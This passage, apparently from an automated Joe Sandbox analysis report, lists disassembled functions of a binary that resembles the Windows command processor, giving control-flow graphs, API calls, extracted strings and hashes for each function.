                              control_flow_graph 420 7ff744f13c24-7ff744f13c61 421 7ff744f13c67-7ff744f13c99 call 7ff744f0af14 call 7ff744f0ca40 420->421 422 7ff744f1ec5a-7ff744f1ec5f 420->422 431 7ff744f1ec97-7ff744f1eca1 call 7ff744f1855c 421->431 432 7ff744f13c9f-7ff744f13cb2 call 7ff744f0b900 421->432 422->421 424 7ff744f1ec65-7ff744f1ec6a 422->424 426 7ff744f1412e-7ff744f1415b call 7ff744f18f80 424->426 432->431 437 7ff744f13cb8-7ff744f13cbc 432->437 438 7ff744f13cbf-7ff744f13cc7 437->438 438->438 439 7ff744f13cc9-7ff744f13ccd 438->439 440 7ff744f13cd2-7ff744f13cd8 439->440 441 7ff744f13cda-7ff744f13cdf 440->441 442 7ff744f13ce5-7ff744f13d62 GetCurrentDirectoryW towupper iswalpha 440->442 441->442 443 7ff744f13faa-7ff744f13fb3 441->443 444 7ff744f13fb8 442->444 445 7ff744f13d68-7ff744f13d6c 442->445 443->440 447 7ff744f13fc6-7ff744f13fec GetLastError call 7ff744f1855c call 7ff744f1a5d6 444->447 445->444 446 7ff744f13d72-7ff744f13dcd towupper GetFullPathNameW 445->446 446->447 448 7ff744f13dd3-7ff744f13ddd 446->448 450 7ff744f13ff1-7ff744f14007 call 7ff744f1855c _local_unwind 447->450 448->450 451 7ff744f13de3-7ff744f13dfb 448->451 461 7ff744f1400c-7ff744f14022 GetLastError 450->461 453 7ff744f140fe-7ff744f14119 call 7ff744f1855c _local_unwind 451->453 454 7ff744f13e01-7ff744f13e11 451->454 463 7ff744f1411a-7ff744f1412c call 7ff744f0ff70 call 7ff744f1855c 453->463 454->453 457 7ff744f13e17-7ff744f13e28 454->457 460 7ff744f13e2c-7ff744f13e34 457->460 460->460 464 7ff744f13e36-7ff744f13e3f 460->464 465 7ff744f14028-7ff744f1402b 461->465 466 7ff744f13e95-7ff744f13e9c 461->466 463->426 468 7ff744f13e42-7ff744f13e55 464->468 465->466 469 7ff744f14031-7ff744f14047 call 7ff744f1855c _local_unwind 465->469 470 7ff744f13e9e-7ff744f13ec2 call 7ff744f12978 466->470 471 7ff744f13ecf-7ff744f13ed3 466->471 475 7ff744f13e57-7ff744f13e60 468->475 476 7ff744f13e66-7ff744f13e8f GetFileAttributesW 468->476 487 7ff744f1404c-7ff744f14062 call 7ff744f1855c _local_unwind 469->487 479 7ff744f13ec7-7ff744f13ec9 470->479 473 7ff744f13f08-7ff744f13f0b 471->473 474 7ff744f13ed5-7ff744f13ef7 GetFileAttributesW 471->474 483 7ff744f13f0d-7ff744f13f11 473->483 484 7ff744f13f1e-7ff744f13f40 SetCurrentDirectoryW 473->484 481 7ff744f14067-7ff744f14098 GetLastError call 7ff744f1855c _local_unwind 474->481 482 7ff744f13efd-7ff744f13f02 474->482 475->476 485 7ff744f13f9d-7ff744f13fa5 475->485 476->461 476->466 479->471 479->487 490 7ff744f1409d-7ff744f140b3 call 7ff744f1855c _local_unwind 481->490 482->473 482->490 491 7ff744f13f13-7ff744f13f1c 483->491 492 7ff744f13f46-7ff744f13f69 call 7ff744f1498c 483->492 484->492 493 7ff744f140b8-7ff744f140de GetLastError call 7ff744f1855c _local_unwind 484->493 485->468 487->481 490->493 491->484 491->492 503 7ff744f140e3-7ff744f140f9 call 7ff744f1855c _local_unwind 492->503 504 7ff744f13f6f-7ff744f13f98 call 7ff744f1417c 492->504 493->503 503->453 504->463
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                              • String ID: :
                              • API String ID: 1809961153-336475711
                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction ID: d973879bed12015df72a4bba9b949f625cdeec3256fa404a73f32ec130896df1
                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction Fuzzy Hash: 19D11C2260CB85C2EB64BF16E4952A9A7B1FB84750F884235DD8E426E9DF3CE944DB10
                              Function 00007FF744F12394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 602 7ff744f12394-7ff744f12416 memset call 7ff744f0ca40 605 7ff744f1241c-7ff744f12453 GetModuleFileNameW call 7ff744f1081c 602->605 606 7ff744f1e0d2-7ff744f1e0da call 7ff744f14c1c 602->606 611 7ff744f1e0db-7ff744f1e0ee call 7ff744f1498c 605->611 612 7ff744f12459-7ff744f12468 call 7ff744f1081c 605->612 606->611 618 7ff744f1e0f4-7ff744f1e107 call 7ff744f1498c 611->618 617 7ff744f1246e-7ff744f1247d call 7ff744f1081c 612->617 612->618 623 7ff744f12483-7ff744f12492 call 7ff744f1081c 617->623 624 7ff744f12516-7ff744f12529 call 7ff744f1498c 617->624 625 7ff744f1e10d-7ff744f1e123 618->625 623->625 632 7ff744f12498-7ff744f124a7 call 7ff744f1081c 623->632 624->623 628 7ff744f1e13f-7ff744f1e17a _wcsupr 625->628 629 7ff744f1e125-7ff744f1e139 wcschr 625->629 634 7ff744f1e17c-7ff744f1e17f 628->634 635 7ff744f1e181-7ff744f1e199 wcsrchr 628->635 629->628 633 7ff744f1e27c 629->633 642 7ff744f124ad-7ff744f124c5 call 7ff744f13c24 632->642 643 7ff744f1e2a1-7ff744f1e2c3 _wcsicmp 632->643 637 7ff744f1e283-7ff744f1e29b call 7ff744f1498c 633->637 638 7ff744f1e19c 634->638 635->638 637->643 641 7ff744f1e1a0-7ff744f1e1a7 638->641 641->641 645 7ff744f1e1a9-7ff744f1e1bb 641->645 651 7ff744f124ca-7ff744f124db 642->651 646 7ff744f1e1c1-7ff744f1e1e6 645->646 647 7ff744f1e264-7ff744f1e277 call 7ff744f11300 645->647 649 7ff744f1e1e8-7ff744f1e1f1 646->649 650 7ff744f1e21a 646->650 647->633 653 7ff744f1e201-7ff744f1e210 649->653 654 7ff744f1e1f3-7ff744f1e1f6 649->654 657 7ff744f1e21d-7ff744f1e21f 650->657 655 7ff744f124e9-7ff744f12514 call 7ff744f18f80 651->655 656 7ff744f124dd-7ff744f124e4 ??_V@YAXPEAX@Z 651->656 653->650 659 7ff744f1e212-7ff744f1e218 653->659 654->653 658 7ff744f1e1f8-7ff744f1e1ff 654->658 656->655 657->637 661 7ff744f1e221-7ff744f1e228 657->661 658->653 658->654 659->657 663 7ff744f1e22a-7ff744f1e231 661->663 664 7ff744f1e254-7ff744f1e262 661->664 665 7ff744f1e234-7ff744f1e237 663->665 664->633 665->664 666 7ff744f1e239-7ff744f1e242 665->666 666->664 667 7ff744f1e244-7ff744f1e252 666->667 667->664 667->665
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                              • API String ID: 2622545777-4197029667
                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction ID: 97f7f5ecca4f69be744bbb1543b8bdc4c36f124577b2f96df014b3674f19a3c7
                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction Fuzzy Hash: F7913F61B0DA86C6EF24BF52D8951B9A3A0FF48B84FC94135CD4E476D9DE3CE9059320
                              Function 00007FF744F10580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID: CMD.EXE
                              • API String ID: 1606018815-3025314500
                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction ID: 309dece1a9c2304b93f4ee4ccd785fd950191a00393b0ef31c026ed3b4818e58
                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction Fuzzy Hash: AF41EE31A0D712CBE704BF56E994578BAA0BB99B56FCC4134CD0E423E8DF3CA454E620
                              Function 00007FF744F0C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 680 7ff744f0c620-7ff744f0c66f GetConsoleTitleW 681 7ff744f1c5f2 680->681 682 7ff744f0c675-7ff744f0c687 call 7ff744f0af14 680->682 685 7ff744f1c5fc-7ff744f1c60c GetLastError 681->685 686 7ff744f0c689 682->686 687 7ff744f0c68e-7ff744f0c69d call 7ff744f0ca40 682->687 688 7ff744f1c5e3 call 7ff744f03278 685->688 686->687 692 7ff744f1c5e8-7ff744f1c5ed call 7ff744f1855c 687->692 693 7ff744f0c6a3-7ff744f0c6ac 687->693 688->692 692->681 695 7ff744f0c6b2-7ff744f0c6c5 call 7ff744f0b9c0 693->695 696 7ff744f0c954-7ff744f0c95e call 7ff744f1291c 693->696 703 7ff744f0c6cb-7ff744f0c6ce 695->703 704 7ff744f0c9b5-7ff744f0c9c9 call 7ff744f15c6c call 7ff744f1855c 695->704 701 7ff744f1c5de-7ff744f1c5e0 696->701 702 7ff744f0c964-7ff744f0c972 call 7ff744f089c0 696->702 701->688 702->685 716 7ff744f0c978-7ff744f0c99a towupper 702->716 703->692 707 7ff744f0c6d4-7ff744f0c6e9 703->707 727 7ff744f0c9d0-7ff744f0c9d7 704->727 708 7ff744f0c6ef-7ff744f0c6fa 707->708 709 7ff744f1c616-7ff744f1c620 call 7ff744f1855c 707->709 712 7ff744f1c627 708->712 713 7ff744f0c700-7ff744f0c713 708->713 709->712 718 7ff744f1c631 712->718 717 7ff744f0c719-7ff744f0c72c 713->717 713->718 721 7ff744f0c9a0-7ff744f0c9a9 716->721 723 7ff744f1c63b 717->723 724 7ff744f0c732-7ff744f0c747 call 7ff744f0d3f0 717->724 718->723 721->721 722 7ff744f0c9ab-7ff744f0c9af 721->722 722->704 725 7ff744f1c60e-7ff744f1c611 call 7ff744f2ec14 722->725 732 7ff744f1c645 723->732 733 7ff744f0c8ac-7ff744f0c8af 724->733 734 7ff744f0c74d-7ff744f0c750 724->734 725->709 730 7ff744f0c9dd-7ff744f1c6da SetConsoleTitleW 727->730 731 7ff744f0c872-7ff744f0c8aa call 7ff744f1855c call 7ff744f18f80 727->731 730->731 741 7ff744f1c64e-7ff744f1c651 732->741 733->734 740 7ff744f0c8b5-7ff744f0c8d3 wcsncmp 733->740 737 7ff744f0c76a-7ff744f0c76d 734->737 738 7ff744f0c752-7ff744f0c764 call 7ff744f0bd38 734->738 744 7ff744f0c840-7ff744f0c84b call 7ff744f0cb40 737->744 745 7ff744f0c773-7ff744f0c77a 737->745 738->692 738->737 740->737 746 7ff744f0c8d9 740->746 747 7ff744f1c657-7ff744f1c65b 741->747 748 7ff744f0c80d-7ff744f0c811 741->748 761 7ff744f0c84d-7ff744f0c855 call 7ff744f0cad4 744->761 762 7ff744f0c856-7ff744f0c85c call 7ff744f07a70 744->762 753 7ff744f0c780-7ff744f0c784 745->753 746->734 747->748 749 7ff744f0c817-7ff744f0c81b 748->749 750 7ff744f0c9e2-7ff744f0c9e7 748->750 755 7ff744f0ca1b-7ff744f0ca1f 749->755 756 7ff744f0c821 749->756 750->749 757 7ff744f0c9ed-7ff744f0c9f7 call 7ff744f1291c 750->757 758 7ff744f0c78a-7ff744f0c7a4 wcschr 753->758 759 7ff744f0c83d 753->759 755->756 763 7ff744f0ca25-7ff744f1c6b3 call 7ff744f03278 755->763 764 7ff744f0c824-7ff744f0c82d 756->764 779 7ff744f0c9fd-7ff744f0ca00 757->779 780 7ff744f1c684-7ff744f1c698 call 7ff744f03278 757->780 766 7ff744f0c7aa-7ff744f0c7ad 758->766 767 7ff744f0c8de-7ff744f0c8f7 758->767 759->744 761->762 777 7ff744f0c862-7ff744f0c86c 762->777 763->692 764->764 770 7ff744f0c82f-7ff744f0c837 764->770 772 7ff744f0c7b0-7ff744f0c7b8 766->772 773 7ff744f0c900-7ff744f0c908 767->773 770->753 770->759 772->772 774 7ff744f0c7ba-7ff744f0c7c7 772->774 773->773 775 7ff744f0c90a-7ff744f0c915 773->775 774->741 781 7ff744f0c7cd-7ff744f0c7db 774->781 782 7ff744f0c917 775->782 783 7ff744f0c93a-7ff744f0c944 775->783 777->727 777->731 779->749 786 7ff744f0ca06-7ff744f0ca10 call 7ff744f089c0 779->786 780->692 787 7ff744f0c7e0-7ff744f0c7e7 781->787 788 7ff744f0c920-7ff744f0c928 782->788 790 7ff744f0ca2a-7ff744f0ca2f call 7ff744f19158 783->790 791 7ff744f0c94a 783->791 786->749 799 7ff744f0ca16-7ff744f1c67f GetLastError call 7ff744f03278 786->799 794 7ff744f0c7e9-7ff744f0c7f1 787->794 795 7ff744f0c800-7ff744f0c803 787->795 796 7ff744f0c92a-7ff744f0c92f 788->796 797 7ff744f0c932-7ff744f0c938 788->797 790->701 791->696 794->795 800 7ff744f0c7f3-7ff744f0c7fe 794->800 795->732 801 7ff744f0c809 795->801 796->797 797->783 797->788 799->692 800->787 800->795 801->748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitlewcschr
                              • String ID: /$:
                              • API String ID: 2364928044-4222935259
                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction ID: b8e50f7c11ef059dba6e433afef02a1ff7cde44faf4d7bd46017f958e31c05ea
                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction Fuzzy Hash: E2C16F61A1D682C1FB68BF179498279E2A1EF91B50FCD5131DD1E462D9EF3CE844E320
                              Function 00007FF744F07AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 807 7ff744f07aa0-7ff744f07ad9 808 7ff744f07aeb-7ff744f07b38 memset call 7ff744f0ca40 807->808 809 7ff744f07adb-7ff744f07ae5 call 7ff744f1291c 807->809 815 7ff744f1ae4e-7ff744f1ae53 808->815 816 7ff744f07b3e-7ff744f07b6d GetFullPathNameW 808->816 809->808 814 7ff744f1ae3a-7ff744f1ae49 call 7ff744f03278 809->814 826 7ff744f07bb7-7ff744f07bdd call 7ff744f18f80 814->826 818 7ff744f1ae61-7ff744f1ae63 815->818 819 7ff744f07b73-7ff744f07b78 816->819 820 7ff744f1ae55-7ff744f1ae5c GetLastError 816->820 822 7ff744f1af64-7ff744f1af6b call 7ff744f03278 818->822 823 7ff744f1ae68-7ff744f1ae6d 819->823 824 7ff744f07b7e-7ff744f07b91 CreateDirectoryW 819->824 820->818 827 7ff744f1ae74-7ff744f1ae7e call 7ff744f03278 823->827 828 7ff744f07b93-7ff744f07ba7 824->828 829 7ff744f07bdf-7ff744f07bf2 GetLastError 824->829 842 7ff744f1ae84-7ff744f1ae8e 827->842 835 7ff744f07bb5 828->835 836 7ff744f07ba9-7ff744f07bb0 free 828->836 832 7ff744f1ae6f 829->832 833 7ff744f07bf8-7ff744f07bfb 829->833 832->827 833->818 839 7ff744f07c01-7ff744f07c08 833->839 835->826 836->835 840 7ff744f07c0e-7ff744f07c2e 839->840 841 7ff744f1af5f 839->841 840->842 843 7ff744f07c34-7ff744f07c4a 840->843 841->822 842->841 844 7ff744f1ae94-7ff744f1aea4 842->844 845 7ff744f07cd1-7ff744f07ced CreateDirectoryW 843->845 846 7ff744f07c50 843->846 844->841 847 7ff744f1aeaa-7ff744f1aeca 844->847 845->828 848 7ff744f07cf3 845->848 849 7ff744f07cbe-7ff744f07cc1 846->849 852 7ff744f1aecc 847->852 853 7ff744f1aef1-7ff744f1aef5 847->853 854 7ff744f1af46-7ff744f1af54 GetLastError 848->854 850 7ff744f07cc3-7ff744f07cc6 849->850 851 7ff744f07cad-7ff744f07cb0 849->851 856 7ff744f07ca5-7ff744f07cab 850->856 857 7ff744f07cc8 850->857 861 7ff744f07c52-7ff744f07c79 CreateDirectoryW 851->861 862 7ff744f07cb2-7ff744f07cbb 851->862 858 7ff744f1aecf-7ff744f1aed6 852->858 859 7ff744f1aef7-7ff744f1af00 853->859 860 7ff744f1af03-7ff744f1af0b 853->860 854->828 855 7ff744f1af5a 854->855 855->818 856->851 867 7ff744f07cca 856->867 857->861 858->853 863 7ff744f1aed8-7ff744f1aeef 858->863 859->860 860->845 864 7ff744f1af11-7ff744f1af18 860->864 865 7ff744f07c8f-7ff744f07ca0 861->865 866 7ff744f07c7b-7ff744f07c89 GetLastError 861->866 862->849 863->853 863->858 868 7ff744f1af1a-7ff744f1af31 864->868 869 7ff744f1af33-7ff744f1af37 864->869 865->856 866->841 866->865 867->845 868->864 868->869 869->845 870 7ff744f1af3d 869->870 870->854
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                              • String ID:
                              • API String ID: 1445986735-0
                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction ID: 32632971fc774d307bb2d75e1c1323aff88500682a0ec6e8ad495338f62c33bf
                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction Fuzzy Hash: 3A917362A0CB82C6EB65BF1294846B9F3A1FB84B85F898135DD4D077D8DF3CD940A720
                              Function 00007FF744F18D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 4291973834-0
                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction ID: a975b078e1f409cfba208c3e6e3cb99acd71dbf43d12ad3d933532e75396944f
                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction Fuzzy Hash: 4A41A031A0CA02C6FB50BF52EAC0279A2A5AB54784FC84535DD4D876E8DF7CEC94A760
                              Function 00007FF744F14A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                              • memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                              • String ID:
                              • API String ID: 1623332820-0
                              • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                              • Instruction ID: bdb44c50045fdb1e58795b7cba7463e67017244e6ce5f0ba37a7d60873be03ed
                              • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                              • Instruction Fuzzy Hash: C0119122A1C742C2DB10BF02A454039FBB0EB89F80B9D9035DE4E03788DE3DE8419760
                              Function 00007FF744F0CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                              • API String ID: 2221118986-3416068913
                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction ID: d68bab9a3694ba35ec607accdd3fd8a8cbd7a44ef28edcdee22fa909431904d6
                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction Fuzzy Hash: B011C621A0D682C1EB54FF57A1D42B992A09F84BA4F9C4331DE6D4B7DDEE2CD480A320
                              Function 00007FF744F0BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 958 7ff744f0be00-7ff744f0be15 959 7ff744f0befb-7ff744f0befd 958->959 960 7ff744f0be1b-7ff744f0be22 958->960 962 7ff744f0bed2-7ff744f0bee2 959->962 960->959 961 7ff744f0be28-7ff744f0be2b 960->961 961->959 963 7ff744f0be31-7ff744f0be45 961->963 964 7ff744f0be47-7ff744f0be69 memset call 7ff744f0bff0 963->964 965 7ff744f0be6b-7ff744f0be6d 963->965 964->965 974 7ff744f0beaf-7ff744f0beb6 964->974 967 7ff744f0bf20-7ff744f0bf23 965->967 968 7ff744f0be73-7ff744f0be79 965->968 967->968 969 7ff744f0bf29-7ff744f0bf39 call 7ff744f0cd90 967->969 971 7ff744f0be7b-7ff744f0be89 968->971 972 7ff744f0be92-7ff744f0be9a 968->972 969->974 986 7ff744f0bf3f-7ff744f0bf42 969->986 971->972 975 7ff744f0be8b-7ff744f0be90 971->975 976 7ff744f0be9c call 7ff744f0c620 972->976 977 7ff744f0bee4-7ff744f0bef9 972->977 979 7ff744f0bec8-7ff744f0beca 974->979 980 7ff744f0beb8-7ff744f0bec3 call 7ff744f0bff0 974->980 975->972 982 7ff744f0bf0c-7ff744f0bf18 call 7ff744f0b0d8 975->982 984 7ff744f0bea1-7ff744f0bead 976->984 977->984 979->962 980->979 982->972 992 7ff744f0bf1e 982->992 984->974 989 7ff744f0beff-7ff744f0bf03 984->989 990 7ff744f0bf9e-7ff744f0bfab call 7ff744f071ec 986->990 991 7ff744f0bf44-7ff744f0bf5d call 7ff744f088a8 986->991 989->974 995 7ff744f0bf05-7ff744f0bf0a call 7ff744f0af98 989->995 990->974 999 7ff744f0bfb1-7ff744f0bfc1 call 7ff744f0cd90 990->999 991->990 1000 7ff744f0bf5f-7ff744f0bf73 call 7ff744f10a6c 991->1000 992->974 995->974 999->974 1006 7ff744f0bfc7-7ff744f0bfe1 call 7ff744f1081c 999->1006 1000->990 1007 7ff744f0bf75-7ff744f0bf81 call 7ff744f0b0d8 1000->1007 1006->1007 1007->974 1012 7ff744f0bf87-7ff744f0bf99 call 7ff744f15ad8 1007->1012 1012->984
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
